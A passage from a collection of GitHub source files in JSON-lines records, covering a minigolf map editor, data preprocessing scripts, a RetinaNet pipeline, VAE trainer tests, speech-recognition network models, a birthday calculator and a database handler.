len(possibleActions) != 0:\n return random.choice(possibleActions)\n else:\n return None","repo_name":"abken601/Tic-Tac-Toe-Deep-Reinforcement-Learning","sub_path":"gameplay.py","file_name":"gameplay.py","file_ext":"py","file_size_in_byte":5080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"28652357991","text":"import json\n\nimport tkinter as tk\nfrom tkinter import filedialog, simpledialog\nimport pygame\n\nfrom client.resources.ResourcesManager import ResourcesManager\nfrom editor.Structures import Object, Button, ToolIcon, MapTile\n\n\ndef export(map):\n root = tk.Tk()\n root.withdraw()\n\n map_id = simpledialog.askinteger(title=\"Map ID\",\n prompt=\"Enter the map ID:\")\n\n file_path = filedialog.asksaveasfilename(defaultextension='.json')\n\n if len(file_path) == 0 or file_path == \"()\":\n return\n\n data = {\n \"id\": map_id,\n \"obstacles\": [],\n \"surfaces\": [],\n \"cup\": {},\n \"ball\": {}\n }\n\n for tile in map:\n if tile.has_object():\n for obj in tile.objects:\n if obj.type == 'cup':\n pos = (tile.rect[0] + obj.image.get_width() // 2,\n tile.rect[1] + obj.image.get_height() // 2)\n dim = obj.image.get_size()\n\n data['cup']['name'] = obj.name\n data['cup']['pos'] = pos\n data['cup']['dim'] = dim\n data['cup']['rotation'] = obj.rotation\n\n elif obj.type == 'ball':\n pos = (tile.rect[0] + obj.image.get_width() // 2,\n tile.rect[1] + obj.image.get_height() // 2)\n dim = (obj.image.get_width() // 2, obj.image.get_height() // 2)\n\n data['ball']['name'] = obj.name\n data['ball']['pos'] = pos\n data['ball']['dim'] = dim\n data['ball']['rotation'] = obj.rotation\n else:\n pos = (tile.rect[0], tile.rect[1])\n dim = (obj.image.get_width(), obj.image.get_height())\n\n data[obj.type].append({\n 'name': obj.name,\n 'pos': pos,\n 'dim': dim,\n 'rotation': obj.rotation,\n 'vertical': obj.vertical,\n 'horizontal': obj.horizontal\n })\n\n with open(file_path, 'w') as outfile:\n json.dump(data, outfile)\n\n\ndef save(map):\n root = tk.Tk()\n root.withdraw()\n\n file_path = filedialog.asksaveasfilename(defaultextension='.json')\n\n if len(file_path) == 0 or file_path == \"()\":\n return\n\n data = {\n 'map': []\n }\n\n for tile in map:\n obj_list = []\n\n for obj in tile.objects:\n obj_list.append({\n 'name': obj.name,\n 'rect': (tile.rect[0], tile.rect[1], tile.rect[2], tile.rect[3]),\n 'dim': obj.image.get_size(),\n 'vertical': obj.vertical,\n 'horizontal': obj.horizontal,\n 'rotation': obj.rotation,\n 'type': obj.type\n })\n\n data['map'].append(obj_list)\n\n with open(file_path, 'w') as outfile:\n json.dump(data, outfile)\n\n\ndef load(map):\n root = tk.Tk()\n root.withdraw()\n\n file_path = filedialog.askopenfilename()\n\n if len(file_path) == 0 or file_path == \"()\":\n return\n\n with open(file_path) as file:\n data = json.load(file)\n\n map_data = data['map']\n\n for i in range(len(map)):\n obj_list = map_data[i]\n\n if len(obj_list) > 0:\n tile = MapTile(map[i].rect, None)\n\n for obj in obj_list:\n tile.add_object(Object(pygame.transform.scale(ResourcesManager.get_image(obj['name']),\n obj['dim']), obj['name'], obj['rotation'], obj['type'],\n horiz=obj['horizontal'], vert=obj['vertical']))\n\n map[i] = tile\n","repo_name":"krzysztofMlczk/MiniGolf-python-","sub_path":"editor/FileUtils.py","file_name":"FileUtils.py","file_ext":"py","file_size_in_byte":3775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"2736023826","text":"#\n# The purpose of this program 
is to preprocess data we receive from the DataInterconnect\n# to a format more usable by the datascience models we're constructing.\n#\nimport csv\n\nparsed = csv.reader(open('../rawdata.csv'))\n\nwriter = csv.writer(open('../datasets/Augmented.csv', 'w', newline=''))\n\n\n#new format\n# \"timestamp\",\"open\",\"high\",\"low\",\"Close\",\"volume\",\n# 1612588920000,38984.04,38984.05,38966.36,38972.2,2.4257,\n\npreviousTimestamp = 0\nprevRow = []\nfor row in parsed:\n print(row)\n if(row[0]==\"timestamp\"):\n newRow = [\"Timestamp\",\"Open\",\"High\",\"Low\",\"Close\",\"Volume_(BTC)\",\"Volume_(Currency)\",\"Weighted_Price\"]\n writer.writerow(newRow)\n if(row[0]!=\"timestamp\"):\n newRow = [row[0],row[1],row[2],row[3],row[4],\"0.9\",str(float(row[4])*0.9),row[4]]\n writer.writerow(newRow)\n","repo_name":"AustinHoover/crypto","sub_path":"analysis/preprocessing/newdata.py","file_name":"newdata.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"5020543988","text":"import tensorflow as tf\n\nfrom retinanet.dataloader.utils import (convert_to_xywh, normalize_image,\n random_flip_horizontal)\n\n\nclass PreprocessingPipelineV2:\n def __init__(self, input_shape, params):\n\n if not input_shape[0] == input_shape[1]:\n raise AssertionError('Non square inputs are not supported, got {}'\n .format(input_shape))\n\n self.target_size = input_shape[0]\n self.preprocessing_params = params.preprocessing\n self.augmentation_params = params.augmentations\n\n def _resize_with_pad(self, image):\n target_size = self.target_size\n image_size = tf.cast(tf.shape(image)[:2], dtype=tf.float32)\n scale = tf.reduce_min(target_size / image_size)\n\n scaled_shape = tf.round(scale * image_size)\n resize_scale = scaled_shape / image_size\n scaled_shape = tf.cast(scaled_shape, dtype=tf.int32)\n image = tf.image.resize(image, size=scaled_shape)\n image = tf.image.pad_to_bounding_box(image, 0, 0, target_size,\n target_size)\n return image, image_size, resize_scale\n\n def _rescale_labels(self,\n boxes,\n class_ids,\n image_size,\n resize_scale,\n offset,\n target_size):\n boxes = tf.stack(\n [\n boxes[:, 0] * image_size[1] * resize_scale[1] - offset[1],\n boxes[:, 1] * image_size[0] * resize_scale[0] - offset[0],\n boxes[:, 2] * image_size[1] * resize_scale[1] - offset[1],\n boxes[:, 3] * image_size[0] * resize_scale[0] - offset[0],\n ],\n axis=-1,\n )\n boxes = tf.clip_by_value(\n boxes, 0.0,\n [target_size[1], target_size[0], target_size[1], target_size[0]])\n\n boxes = convert_to_xywh(boxes)\n idx = tf.where(\n tf.logical_and(tf.greater(boxes[:, 2], 0.), tf.greater(boxes[:, 3],\n 0.)))[:, 0]\n boxes = tf.gather(boxes, idx)\n class_ids = tf.gather(class_ids, idx)\n return boxes, class_ids\n\n def _random_rescale_image(self, image):\n target_size = tf.cast(self.target_size, dtype=tf.float32)\n scale = tf.random.uniform([],\n self.augmentation_params.scale_jitter.min_scale,\n self.augmentation_params.scale_jitter.max_scale)\n\n scaled_shape = tf.cast(tf.round(scale * target_size), dtype=tf.int32)\n image = tf.image.resize(image, size=[scaled_shape, scaled_shape])\n return image\n\n def _random_crop_image_and_labels(self, image, boxes, class_ids):\n image_size = tf.shape(image)\n min_object_covered = tf.random.uniform((), minval=0.1, maxval=0.9)\n boxes_transposed = tf.stack(\n [boxes[:, 1], boxes[:, 0], boxes[:, 3], boxes[:, 2]], axis=-1)\n\n offset, size, _ = tf.image.sample_distorted_bounding_box(\n 
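The preprocessing script above branches on the header row and addresses columns by position. The same augmentation can be written with csv.DictReader/csv.DictWriter, which names the synthetic volume columns explicitly. A sketch under the same assumptions (the input header shown in the script's comment, a fixed 0.9 BTC volume placeholder; file paths are illustrative):

import csv

FIELDS = ["Timestamp", "Open", "High", "Low", "Close",
          "Volume_(BTC)", "Volume_(Currency)", "Weighted_Price"]

with open('rawdata.csv', newline='') as src, \
        open('Augmented.csv', 'w', newline='') as dst:
    reader = csv.DictReader(src)
    writer = csv.DictWriter(dst, fieldnames=FIELDS, extrasaction='ignore')
    writer.writeheader()
    for row in reader:
        close = float(row['Close'])
        writer.writerow({
            "Timestamp": row['timestamp'],
            "Open": row['open'],
            "High": row['high'],
            "Low": row['low'],
            "Close": row['Close'],
            "Volume_(BTC)": "0.9",                 # placeholder, as in the script above
            "Volume_(Currency)": str(close * 0.9),
            "Weighted_Price": row['Close'],
        })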
image_size=image_size,\n bounding_boxes=tf.expand_dims(boxes_transposed, axis=0),\n min_object_covered=min_object_covered,\n aspect_ratio_range=[0.8, 1.25],\n area_range=[0.1, 1.0],\n max_attempts=100,\n name='random_crop_image_and_labels')\n\n image = tf.slice(image, offset, size)\n image, _, resize_scale = self._resize_with_pad(image)\n\n offset = tf.cast(offset, dtype=tf.float32)\n size = tf.cast(size, dtype=tf.float32)\n image_size = tf.cast(image_size, dtype=tf.float32)\n\n boxes, class_ids = self._rescale_labels(\n boxes=boxes,\n class_ids=class_ids,\n image_size=image_size[:2],\n resize_scale=[1.0, 1.0],\n offset=offset[:2],\n target_size=size[:2] - 1.0)\n\n boxes = boxes * tf.stack([resize_scale[1], resize_scale[0],\n resize_scale[1], resize_scale[0]], axis=-1)\n return image, boxes, class_ids\n\n def __call__(self, sample):\n image = normalize_image(\n sample[\"image\"],\n offset=self.preprocessing_params.offset,\n scale=self.preprocessing_params.scale)\n\n boxes = sample[\"objects\"][\"bbox\"]\n class_ids = tf.cast(sample[\"objects\"][\"label\"], dtype=tf.int32)\n\n if self.augmentation_params.use_augmentation \\\n and self.augmentation_params.horizontal_flip:\n image, boxes = random_flip_horizontal(image, boxes)\n\n if tf.random.uniform([]) < 0.5 or \\\n not self.augmentation_params.use_augmentation:\n image, image_shape, resize_scale = self._resize_with_pad(image)\n boxes, class_ids = self._rescale_labels(\n boxes=boxes,\n class_ids=class_ids,\n image_size=image_shape,\n resize_scale=resize_scale,\n offset=[0.0, 0.0],\n target_size=[self.target_size, self.target_size])\n else:\n if tf.random.uniform([]) < 0.5 \\\n and self.augmentation_params.use_augmentation:\n image = self._random_rescale_image(image)\n\n image, boxes, class_ids = self._random_crop_image_and_labels(\n image,\n boxes,\n class_ids)\n\n image.set_shape([self.target_size, self.target_size, 3])\n return image, boxes, class_ids\n\n def preprocess_val_sample(self, sample):\n image = normalize_image(\n sample[\"image\"],\n offset=self.preprocessing_params.offset,\n scale=self.preprocessing_params.scale)\n\n image, _, resize_scale = self._resize_with_pad(image)\n return {\n 'image': image,\n 'image_id': sample['image_id'],\n 'resize_scale': resize_scale\n }\n","repo_name":"srihari-humbarwadi/retinanet-tensorflow2.x","sub_path":"retinanet/dataloader/preprocessing_pipeline_v2.py","file_name":"preprocessing_pipeline_v2.py","file_ext":"py","file_size_in_byte":5990,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"27"} +{"seq_id":"22525449906","text":"import unittest\nimport os\nimport shutil\nimport torch\nfrom catvae.trainer import MultVAE, MultBatchVAE, BiomDataModule\nfrom catvae.sim import multinomial_bioms, multinomial_batch_bioms\nfrom biom import Table\nfrom biom.util import biom_open\nimport numpy as np\nfrom pytorch_lightning import Trainer\nimport pandas as pd\n\nfrom scipy.stats import pearsonr\nfrom scipy.spatial.distance import pdist\n\n\nclass TestVAEModel(unittest.TestCase):\n\n def setUp(self):\n np.random.seed(1)\n torch.manual_seed(1)\n self.k, self.D, self.N, self.M = 10, 50, 500, 100000\n self.sims = multinomial_bioms(k=self.k, D=self.D,\n N=self.N, M=self.M)\n Y = self.sims['Y']\n parts = Y.shape[0] // 10\n samp_ids = list(map(str, range(Y.shape[0])))\n obs_ids = list(map(str, range(Y.shape[1])))\n train = Table(Y[:parts * 8].T, obs_ids, samp_ids[:parts * 8])\n test = Table(Y[parts * 8: parts * 9].T,\n obs_ids, samp_ids[parts * 8: parts * 9])\n valid = 
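The _resize_with_pad method in the RetinaNet pipeline above scales the image by one uniform factor so the longer side matches the square target, then zero-pads; the box rescaling must reuse the same per-axis resize_scale. A NumPy-only sketch of that scale computation, for intuition (shapes are illustrative, not from the repo):

import numpy as np

def letterbox_scale(image_hw, target):
    # Mirrors the TF logic: one uniform scale, rounded output shape,
    # then per-axis resize_scale = scaled / original.
    image_hw = np.asarray(image_hw, dtype=np.float32)
    scale = np.min(target / image_hw)        # fit the longer side inside the target
    scaled_hw = np.round(scale * image_hw)
    resize_scale = scaled_hw / image_hw      # ~scale on both axes, modulo rounding
    return scaled_hw.astype(int), resize_scale

print(letterbox_scale((480, 640), 512.0))    # -> ([384, 512], [0.8, 0.8])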
Table(Y[parts * 9:].T, obs_ids, samp_ids[parts * 9:])\n with biom_open('train.biom', 'w') as f:\n train.to_hdf5(f, 'train')\n with biom_open('test.biom', 'w') as f:\n test.to_hdf5(f, 'test')\n with biom_open('valid.biom', 'w') as f:\n valid.to_hdf5(f, 'valid')\n self.sims['tree'].write('basis.nwk')\n\n def tearDown(self):\n if os.path.exists('lightning_logs'):\n shutil.rmtree('lightning_logs')\n if os.path.exists('summary'):\n shutil.rmtree('summary')\n os.remove('basis.nwk')\n os.remove('train.biom')\n os.remove('test.biom')\n os.remove('valid.biom')\n\n @unittest.skip('See the ipynb for a working example.')\n def test_run(self):\n model = MultVAE(n_input=self.D, n_latent=self.k,\n n_hidden=16, basis='basis.nwk',\n dropout=0, bias=True, batch_norm=False,\n encoder_depth=1, learning_rate=0.1,\n overdispersion=False,\n scheduler='cosine_warm', transform='pseudocount')\n model.set_eigs(self.sims['eigvectors'], self.sims['eigs'])\n dm = BiomDataModule('train.biom', 'test.biom', 'valid.biom',\n batch_size=50)\n trainer = Trainer(\n max_epochs=50,\n gpus=0,\n check_val_every_n_epoch=10,\n fast_dev_run=False,\n )\n trainer.fit(model, dm)\n\n # Make sure that the estimates are darn close\n W = model.vae.decoder.weight.detach().cpu().numpy()\n d_estW = pdist(W)\n simW = self.sims['W'] / np.sqrt(self.sims['eigs'])\n dW = pdist(simW)\n r, p = pearsonr(dW, d_estW)\n self.assertGreater(r, 0.9)\n self.assertLess(p, 1e-8)\n\n\nclass TestBatchVAEModel(unittest.TestCase):\n def setUp(self):\n np.random.seed(0)\n torch.manual_seed(0)\n self.k, self.D, self.N, self.M, self.C = 10, 50, 500, 100000, 3\n self.sims = multinomial_batch_bioms(k=self.k, D=self.D,\n N=self.N, M=self.M, C=self.C)\n Y = self.sims['Y']\n parts = Y.shape[0] // 10\n samp_ids = list(map(str, range(Y.shape[0])))\n obs_ids = list(map(str, range(Y.shape[1])))\n train = Table(Y[:parts * 8].T, obs_ids, samp_ids[:parts * 8])\n test = Table(Y[parts * 8: parts * 9].T,\n obs_ids, samp_ids[parts * 8: parts * 9])\n valid = Table(Y[parts * 9:].T, obs_ids, samp_ids[parts * 9:])\n with biom_open('train.biom', 'w') as f:\n train.to_hdf5(f, 'train')\n with biom_open('test.biom', 'w') as f:\n test.to_hdf5(f, 'test')\n with biom_open('valid.biom', 'w') as f:\n valid.to_hdf5(f, 'valid')\n\n md = pd.DataFrame({'batch_category': self.sims['batch_idx']},\n index=samp_ids)\n md.index.name = 'sampleid'\n md.to_csv('metadata.txt', sep='\\t')\n batch_priors = pd.Series(self.sims['alphaILR'])\n batch_priors.to_csv('batch_priors.txt', sep='\\t')\n self.sims['tree'].write('basis.nwk')\n\n def tearDown(self):\n os.remove('basis.nwk')\n os.remove('batch_priors.txt')\n os.remove('metadata.txt')\n os.remove('train.biom')\n os.remove('test.biom')\n os.remove('valid.biom')\n if os.path.exists('lightning_logs'):\n shutil.rmtree('lightning_logs')\n\n @unittest.skip('See the ipynb for a working example.')\n def test_fit(self):\n model = MultBatchVAE(n_input=self.D, n_latent=self.k,\n n_hidden=16, n_batches=self.C,\n basis='basis.nwk', batch_prior='batch_priors.txt',\n dropout=0, bias=True, batch_norm=False,\n encoder_depth=1, learning_rate=0.1,\n scheduler='cosine_warm',\n transform='pseudocount')\n\n model.set_eigs(self.sims['eigvectors'], self.sims['eigs'])\n print(model)\n dm = BiomDataModule('train.biom', 'test.biom', 'valid.biom',\n metadata='metadata.txt',\n batch_category='batch_category',\n batch_size=50)\n\n trainer = Trainer(\n max_epochs=50,\n gpus=0,\n check_val_every_n_epoch=1,\n fast_dev_run=False,\n )\n trainer.fit(model, dm)\n\n # See if the model can 
approximately recover W\n W = model.vae.decoder.weight.detach().cpu().numpy()\n d_estW = pdist(W)\n simW = self.sims['W'] / np.sqrt(self.sims['eigs'])\n dW = pdist(simW)\n r, p = pearsonr(dW, d_estW)\n self.assertGreater(r, 0.15)\n self.assertLess(p, 0.001)\n # See if the model can approximately remove beta\n B = model.vae.beta.weight.detach().cpu().numpy().T\n d_estB = pdist(B)\n simB = self.sims['B'].T\n dB = pdist(simB)\n r, p = pearsonr(dB, d_estB)\n self.assertGreater(r, 0.3)\n self.assertLess(p, 1e-8)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"flatironinstitute/catvae","sub_path":"catvae/tests/test_trainer.py","file_name":"test_trainer.py","file_ext":"py","file_size_in_byte":6231,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"27"} +{"seq_id":"34591157254","text":"import os\nimport csv\n\nfrom data_types import Purchase\n\n\ndef main():\n print_header()\n filename = get_data_file()\n data = load_file(filename)\n query_data(data)\n\n\ndef print_header():\n print('REAL ESTATE APP')\n print('===============')\n\n\ndef get_data_file():\n base_folder = os.path.dirname(__file__)\n return os.path.join(base_folder, 'data', 'realestate.csv')\n\n\ndef load_file(filename):\n with open(filename, 'r', encoding='utf-8') as fin:\n reader = csv.DictReader(fin)\n purchases = []\n\n for row in reader:\n p = Purchase.create_from_dict(row)\n purchases.append(row)\n\n return purchases\n\ndef get_price(p):\n return p['price']\n\ndef query_data(data):\n data.sort(key=get_price)\n print(data)\n high_purchase = data[-1]\n low_purchase = data[0]\n\n print(high_purchase['price'])\n print('{:,}'.format(float(low_purchase['price'])))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"hamanovich/py-10apps","sub_path":"09_real_estate (DOESNT WORK)/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"11832382667","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchaudio\n\n\ndef get_model(in_dim, out_dim, num_layers, hidden_dims, arch,\n kernel_sizes=None, strides=None, dilations=None, bidirectional=True, dropout=0, residual=False, **others):\n valid_archs = ['TDNN', 'RNN', 'LSTM', 'GRU', 'TDNN-LSTM', 'TDNN-MFCC']\n if arch not in valid_archs:\n raise ValueError('Supported models are: {} \\n'\n 'but given {}'.format(valid_archs, arch))\n if arch == 'TDNN':\n if not kernel_sizes or not dilations or not strides:\n raise ValueError(\n 'Please specify kernel sizes, strides and dilations for TDNN')\n model = TDNN(in_dim, out_dim, num_layers,\n hidden_dims, kernel_sizes, strides, dilations, dropout, residual)\n\n elif arch == 'TDNN-MFCC':\n if not kernel_sizes or not dilations or not strides:\n raise ValueError(\n 'Please specify kernel sizes, strides and dilations for TDNN')\n model = TDNN_MFCC(in_dim, out_dim, num_layers,\n hidden_dims, kernel_sizes, strides, dilations, dropout)\n\n elif arch == 'TDNN-LSTM':\n if not kernel_sizes or not dilations or not strides:\n raise ValueError(\n 'Please specify kernel sizes, strides and dilations for TDNN-LSTM')\n model = TDNNLSTM(in_dim, out_dim, num_layers, hidden_dims, kernel_sizes,\n strides, dilations, bidirectional, dropout, residual)\n else:\n # we simply use same hidden dim for all rnn layers\n hidden_dim = hidden_dims[0]\n model = RNN(in_dim, out_dim, num_layers, hidden_dim,\n arch, bidirectional, dropout)\n\n return 
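The real-estate loader above has two defects (the repo path itself flags it as not working): load_file builds a Purchase but appends the raw csv row, and get_price returns the price as a string, so the sort is lexicographic rather than numeric. A corrected sketch of those two functions, assuming Purchase.create_from_dict exposes the csv fields as attributes such as p.price — an assumption, since data_types is not shown; query_data would then read .price attributes instead of dict keys:

def load_file(filename):
    with open(filename, 'r', encoding='utf-8') as fin:
        reader = csv.DictReader(fin)
        purchases = []
        for row in reader:
            p = Purchase.create_from_dict(row)
            purchases.append(p)   # append the Purchase, not the raw dict
        return purchases

def get_price(p):
    # Numeric key so '900000' no longer sorts below '99000'.
    # Assumes a float-convertible `price` attribute on Purchase (hypothetical).
    return float(p.price)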
model\n\n\nclass TDNNLSTM(nn.Module):\n def __init__(self, in_dim, out_dim, num_layers, hidden_dims, kernel_sizes, strides, dilations,\n bidirectional=False, dropout=0):\n super(TDNNLSTM, self).__init__()\n self.num_tdnn_layers = len(hidden_dims)\n self.num_lstm_layers = num_layers - len(hidden_dims)\n assert len(kernel_sizes) == self.num_tdnn_layers\n assert len(strides) == self.num_tdnn_layers\n assert len(dilations) == self.num_tdnn_layers\n self.in_dim = in_dim\n self.out_dim = out_dim\n self.dropout = dropout\n # set lstm hidden_dim to the num_channels of the last cnn layer\n self.lstm_dim = hidden_dims[-1]\n self.tdnn = nn.ModuleList([\n tdnn_bn_relu(\n in_dim if layer == 0 else hidden_dims[layer - 1],\n hidden_dims[layer], kernel_sizes[layer],\n strides[layer], dilations[layer],\n )\n for layer in range(self.num_tdnn_layers)\n ])\n self.num_directions = 2 if bidirectional else 1\n self.lstm = nn.LSTM(self.lstm_dim, self.lstm_dim, self.num_lstm_layers,\n batch_first=True, bidirectional=bidirectional,\n dropout=dropout)\n self.final_layer = nn.Linear(\n self.lstm_dim * self.num_directions, out_dim)\n\n def forward(self, x, x_lengths):\n assert len(x.size()) == 3 # x is of size (B, T, D)\n # turn x to (B, D, T) for tdnn/cnn input\n x = x.transpose(1, 2).contiguous()\n for i in range(len(self.tdnn)):\n # apply Tdnn\n x, x_lengths = self.tdnn[i](x, x_lengths)\n x = F.dropout(x, p=self.dropout, training=self.training)\n x = x.transpose(2, 1).contiguous() # turn it back to (B, T, D)\n bsz = x.size(0)\n state_size = self.num_directions * \\\n self.num_lstm_layers, bsz, self.lstm_dim\n h0, c0 = x.new_zeros(*state_size), x.new_zeros(*state_size)\n x = torch.nn.utils.rnn.pack_padded_sequence(\n x, x_lengths, batch_first=True) # (B, T, D)\n x, _ = self.lstm(x, (h0, c0))\n x, _ = torch.nn.utils.rnn.pad_packed_sequence(\n x, batch_first=True) # (B, T, D)\n x = self.final_layer(x)\n return x, x_lengths\n\n\nclass tdnn_bn_relu(nn.Module):\n def __init__(self, in_dim, out_dim, kernel_size, stride=1, dilation=1):\n super(tdnn_bn_relu, self).__init__()\n self.kernel_size = kernel_size\n self.stride = stride\n self.padding = dilation * (kernel_size - 1) // 2\n self.dilation = dilation\n self.tdnn = nn.Conv1d(in_dim, out_dim, kernel_size,\n stride=stride, padding=self.padding, dilation=dilation)\n self.bn = nn.BatchNorm1d(out_dim)\n self.relu = nn.ReLU(inplace=True)\n\n def output_lengths(self, in_lengths):\n out_lengths = (\n in_lengths + 2 * self.padding - self.dilation * (self.kernel_size - 1) +\n self.stride - 1\n ) // self.stride\n return out_lengths\n\n def forward(self, x, x_lengths):\n assert len(x.size()) == 3 # x is of size (N, F, T)\n x = self.tdnn(x)\n x = self.bn(x)\n x = self.relu(x)\n x_lengths = self.output_lengths(x_lengths)\n return x, x_lengths\n\n\nclass TDNN(nn.Module):\n def __init__(self, in_dim, out_dim, num_layers, hidden_dims, kernel_sizes, strides, dilations,\n dropout=0, residual=False):\n super(TDNN, self).__init__()\n assert len(hidden_dims) == num_layers\n assert len(kernel_sizes) == num_layers\n assert len(strides) == num_layers\n assert len(dilations) == num_layers\n self.dropout = dropout\n self.residual = residual\n self.num_layers = num_layers\n self.tdnn = nn.ModuleList([\n tdnn_bn_relu(\n in_dim if layer == 0 else hidden_dims[layer - 1],\n hidden_dims[layer], kernel_sizes[layer],\n strides[layer], dilations[layer],\n )\n for layer in range(num_layers)\n ])\n self.final_layer = nn.Linear(hidden_dims[-1], out_dim, True)\n\n def forward(self, x, x_lengths):\n assert 
len(x.size()) == 3 # x is of size (B, T, D)\n # turn x to (B, D, T) for tdnn/cnn input\n x = x.transpose(1, 2).contiguous()\n for i in range(len(self.tdnn)):\n # apply Tdnn\n if self.residual and i > 0: # residual starts from the 2nd layer\n prev_x = x\n x, x_lengths = self.tdnn[i](x, x_lengths)\n x = x + prev_x if (self.residual and i >\n 0 and x.size(2) == prev_x.size(2)) else x\n x = F.dropout(x, p=self.dropout, training=self.training)\n x = x.transpose(2, 1).contiguous() # turn it back to (B, T, D)\n x = self.final_layer(x)\n return x, x_lengths\n\n\nclass TDNN_MFCC(nn.Module):\n def __init__(self, in_dim, out_dim, num_layers, hidden_dims, kernel_sizes, strides, dilations, dropout=0):\n super(TDNN_MFCC, self).__init__()\n assert len(hidden_dims) == num_layers\n assert len(kernel_sizes) == num_layers\n assert len(strides) == num_layers\n assert len(dilations) == num_layers\n self.dropout = dropout\n self.num_layers = num_layers\n self.tdnn = nn.ModuleList([\n tdnn_bn_relu(\n in_dim if layer == 0 else hidden_dims[layer - 1],\n hidden_dims[layer], kernel_sizes[layer],\n strides[layer], dilations[layer],\n )\n for layer in range(num_layers)\n ])\n self.mfcc = torchaudio.transforms.MFCC()\n self.final_layer = nn.Linear(hidden_dims[-1], out_dim, True)\n\n def mfcc_output_lengths(self, in_lengths):\n hop_length = self.mfcc.MelSpectrogram.hop_length\n out_lengths = in_lengths // hop_length + 1\n return out_lengths\n\n def forward(self, x, x_lengths):\n assert len(x.size()) == 3 # x is of size (B, T, D)\n # turn x to (B, D, T) for tdnn/cnn input\n x = x.transpose(1, 2).contiguous()\n x = self.mfcc(x)\n x = x.squeeze(1) # x of size (B, D, T)\n x_lengths = self.mfcc_output_lengths(x_lengths)\n for i in range(len(self.tdnn)):\n # apply Tdnn\n x, x_lengths = self.tdnn[i](x, x_lengths)\n x = F.dropout(x, p=self.dropout, training=self.training)\n x = x.transpose(2, 1).contiguous() # turn it back to (B, T, D)\n x = self.final_layer(x)\n return x, x_lengths\n\n\nclass RNN(nn.Module):\n def __init__(self, in_dim, out_dim, num_layers, hidden_dim, rnn_type='LSTM', bidirectional=False, dropout=0):\n super(RNN, self).__init__()\n valid_rnn_types = ['LSTM', 'RNN', 'GRU']\n if rnn_type not in valid_rnn_types:\n raise ValueError(\"Only {0} types are supported but given {1}\".format(\n valid_rnn_types, rnn_type))\n else:\n self.rnn_type = rnn_type\n if rnn_type == 'LSTM':\n self.rnn_module = nn.LSTM\n if rnn_type == 'RNN':\n self.rnn_module = nn.RNN\n if rnn_type == 'GRU':\n self.rnn_module = nn.GRU\n self.in_dim = in_dim\n self.out_dim = out_dim\n self.num_layers = num_layers\n self.hidden_dim = hidden_dim\n self.num_directions = 2 if bidirectional else 1\n self.rnn_layer = self.rnn_module(self.in_dim, self.hidden_dim, self.num_layers,\n batch_first=True, bidirectional=bidirectional,\n dropout=dropout)\n self.final_layer = nn.Linear(hidden_dim * self.num_directions, out_dim)\n\n def forward(self, x, x_lengths):\n bsz = x.size(0)\n state_size = self.num_directions * \\\n self.num_layers, bsz, self.hidden_dim\n h0, c0 = x.new_zeros(*state_size), x.new_zeros(*state_size)\n if self.rnn_type == 'LSTM':\n h0 = (h0, c0)\n x = torch.nn.utils.rnn.pack_padded_sequence(\n x, x_lengths, batch_first=True, enforce_sorted=False) # (B, T, D)\n x, _ = self.rnn_layer(x, h0)\n x, _ = torch.nn.utils.rnn.pad_packed_sequence(\n x, batch_first=True) # (B, T, D)\n x = self.final_layer(x)\n return x, 
x_lengths\n","repo_name":"FAST-ASR/recipes","sub_path":"datasets/wsj/v0.9/ASR/src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10163,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"70965717513","text":"## Dashiell Wendt 2033998\r\n\r\nprint(f\"Birthday Calculator\")\r\nprint(f\"Current day\")\r\ncurrmonth = int(input(\"Month: \"))\r\ncurrday = int(input(\"Day: \"))\r\ncurryear = int(input(\"Year: \"))\r\nprint(f\"Birthday\")\r\nbirtmonth = int(input(\"Month: \"))\r\nbirtday = int(input(\"Day: \"))\r\nbirtyear = int(input(\"Year: \"))\r\nyearsold = curryear - birtyear - 1\r\nif(currmonth > birtmonth):\r\n yearsold += 1\r\nelif(currmonth == birtmonth):\r\n if(currday >= birtday):\r\n yearsold += 1\r\n if(currday == birtday):\r\n print(f\"Happy Birthday!\")\r\nprint(f\"You are {yearsold} years old.\")","repo_name":"dashwhen/cis2334","sub_path":"Homework1/Problem1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42629732573","text":"from typing import Collection\n\nfrom db_models import AreaDBModel, UnitAreaStatsDBModel\nfrom handlers.db import BaseDBHandler\nfrom handlers.db.serialization import BaseDBSchema\n\n\nclass UnitAreaStatsDBSchema(BaseDBSchema):\n class Meta(BaseDBSchema.Meta):\n model = UnitAreaStatsDBModel\n\n\nclass UnitAreaStatsDBHandler(BaseDBHandler):\n schema = UnitAreaStatsDBSchema()\n model = UnitAreaStatsDBModel\n\n @classmethod\n def unit_area_stats_with_area_types(cls, run_ids: Collection[str]):\n with cls.begin_session(readonly=True) as s:\n unit_area_stats = (\n s.query(cls.model).filter(cls.model.run_id.in_(run_ids)).all()\n )\n\n area_types = {\n a.id: a.area_type\n for a in s.query(AreaDBModel.id, AreaDBModel.area_type)\n .filter(AreaDBModel.id.in_({s.area_id for s in unit_area_stats}))\n .all()\n }\n\n return [\n {\n \"run_id\": s.run_id,\n \"unit_id\": s.unit_id,\n \"area_id\": s.area_id,\n \"dimension\": s.dimension,\n \"min\": s.min,\n \"max\": s.max,\n \"mean\": s.mean,\n \"stddev\": s.stddev,\n \"count\": s.count,\n \"area_type\": area_types[s.area_id].name,\n }\n for s in unit_area_stats\n ]\n","repo_name":"Archilyse/Archilyse","sub_path":"handlers/handlers/db/unit_area_stats_handler.py","file_name":"unit_area_stats_handler.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"27"} 